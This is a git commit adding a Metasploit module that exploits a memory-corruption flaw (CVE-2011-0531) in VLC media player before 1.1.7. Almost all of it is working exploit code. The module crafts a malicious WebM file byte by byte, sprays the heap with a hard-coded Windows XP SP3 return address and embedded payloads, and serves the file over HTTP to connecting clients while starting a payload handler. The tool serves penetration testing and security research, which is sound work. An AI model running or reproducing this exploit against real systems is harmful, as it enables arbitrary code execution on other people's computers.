add exploit for VLC media player WebM processing from Dan Rosenburg

git-svn-id: file:///home/svn/framework3/trunk@11692 4d416f70-5f16-0410-b530-b9f4589650da
2011-02-01 18:54:24 +00:00 · 2011-02-01 18:54:24 +00:00 · 3ac076c20a
parent 426f70e752
commit 3ac076c20a
1 changed files with 121 additions and 0 deletions
--- a/modules/exploits/windows/browser/vlc_webm.rb
+++ b/modules/exploits/windows/browser/vlc_webm.rb
@ -0,0 +1,121 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = GoodRanking
+
+	include Msf::Exploit::Remote::HttpServer::HTML
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'VideoLAN VLC MKV Memory Corruption',
+			'Description'    => %q{
+					This module exploits an input validation error in VideoLAN VLC
+				< 1.1.7.  By creating a malicious MKV or WebM file, a remote attacker
+				could execute arbitrary code.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         => [ 'Dan Rosenberg' ],
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+					[ 'OSVDB', '70698' ],
+					[ 'CVE', '2011-0531' ],
+					[ 'BID', '46060' ],
+					[ 'URL', 'http://git.videolan.org/?p=vlc.git&a=commitdiff&h=59491dcedffbf97612d2c572943b56ee4289dd07&hp=f085cfc1c95b922e3c750ee93ec58c3f2d5f7456' ],
+					[ 'URL', 'http://www.videolan.org/security/sa1102.html' ]
+				],
+			'Payload'        =>
+				{
+					'Space'           => 1024,
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'Windows XP SP3', { 'Ret' => 0x05050505 } ],
+				],
+			'Privileged'     => false,
+			'DisclosureDate' => 'Jan 31, 2011',
+			'DefaultTarget'  => 0))
+	end
+
+	def autofilter
+		false
+	end
+
+	def check_dependencies
+		use_zlib
+	end
+
+	def on_request_uri(cli, request)
+
+		return if ((p = regenerate_payload(cli)) == nil)
+
+		# EBML Header
+		file =  "\x1A\x45\xDF\xA3"	# EBML
+		file << "\x01\x00\x00\x00"
+		file << "\x00\x00\x00\x1F"
+		file << "\x42\x86\x81\x01"	# EBMLVersion = 1
+		file << "\x42\xF7\x81\x01"	# EBMLReadVersion = 1
+		file << "\x42\xF2\x81\x04"	# EBMLMaxIDLength = 4
+		file << "\x42\xF3\x81\x08"	# EBMLMaxSizeLength = 8
+		file << "\x42\x82\x84\x77"	# DocType = "webm"
+		file << "\x65\x62\x6D"
+		file << "\x42\x87\x81\x02"	# DocTypeVersion = 2
+		file << "\x42\x85\x81\x02"	# DocTypeReadVersion = 2
+
+		# Segment data
+		file << "\x18\x53\x80\x67"	# (0) Segment
+		file << "\x01\x00\x00\x00"
+		file << "\x01\xD6\x22\xF1"
+
+		# Seek data
+		file << "\x11\x4D\x9B\x74"	# (1) SeekHead
+		file << "\x40\x3F"
+
+		file << "\x4D\xBB\x8B"		# (2) Seek
+		file << "\x53\xAB\x84"		# (3) SeekID = Segment Info
+		file << "\x15\x49\xA9\x66"	#
+
+		file << "\x53\xAC\x81"		# (3) SeekPosition
+		file << "\xff"			# 	index of segment info
+
+		file << "\x53\xAB\x84"		# (3) SeekID = Tracks
+		file << "\x16\x54\xAE\x6B"	#
+
+		file << "\x42" * 228 		# Padding
+
+		# Data
+		file << "\x15\x49\xA9\x66"	# (1) Segment Info
+		file << "\x01\x00\x00\x00"	#
+		file << "\x01\xff\xff\xff"	# This triggers our heap spray...
+		file << [target.ret].pack('V')	# Object address
+
+		# Spray the heap
+		file << ([target.ret].pack('V') * 0xa0000)
+		file << payload.encoded
+		file << ([target.ret].pack('V') * 0xa0000)
+		file << payload.encoded
+		file << ([target.ret].pack('V') * 0xa0000)
+		file << payload.encoded
+		file << ([target.ret].pack('V') * 0xa0000)
+		file << payload.encoded
+
+		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
+
+		send_response_html(cli, file, { 'Content-Type' => 'application/octet-stream' })
+
+		handler(cli)
+
+	end
+end